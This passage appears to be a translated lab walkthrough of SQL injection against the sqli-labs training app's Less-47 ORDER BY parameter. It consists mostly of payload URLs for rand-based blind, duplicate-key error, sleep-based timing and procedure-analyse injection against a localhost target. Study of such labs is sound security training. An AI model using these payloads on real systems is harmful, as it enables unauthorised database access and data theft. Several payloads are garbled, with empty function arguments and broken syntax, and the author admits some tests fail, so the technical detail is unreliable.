, the parameter after order byWe can only use and to do error and delay injection. We give a few payload examples below.
①and Rand is combined in a way that Payload:http://127.0.0.1/sqli-labs/less-47/index.php?sort=1%27and%20rand (ASCII (left (), 1)) =115)--+
After switching to 116, Http://127.0.0.1/sqli-labs/Less-47/index.php?sort=1%27and%20rand (ASCII (Left (database (), 1)) =116)--+
There are still problems in the later tests here, and we cannot use this method for accurate injection. Left here is just an example.
② can be used in the form of error
HTTP://127.0.0.1/SQLI-LABS/LESS-47/?SORT=1%27AND%20 (Select%20count (*)%20from%20information_schema.columns% 20group%20by%20concat (0x3a,0x3a, (Select%20user ()), 0x3a,0x3a,floor (rand ()))--+
You can see the contents of User (), and you can construct additional statements to inject.
Here is an error injection, the principle and the above payload is the same, are using the principle of MySQL duplicates.
Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20 (Select%20*%20from%20 (Select%20name_const (Version (), 1), NAME _const (Version (), 1)) x)--+
Version () is repeated here, so it bursts
③ Delay Injection
Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20If (ASCII (substr () (Database (),) =115,0,sleep (5))--+
Because the database () is security, so the first letter of the S ASCII is 115, here directly, when changed to 116 or other numbers, it is time to delay, we do not show the map, can be scripted blasting.
(2) Procedure analyse parameter after injection
Using the procedure analyse parameter, we can perform an error injection. At the same time, there can be a limit parameter between procedure analyse and order by, and in practice we may also have a limit injection, which can be injected using procedure analyse.
The following is a sample example
Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27procedure%20analyse (Extractvalue (rand (), concat (0x3a,version ())), 1 )--+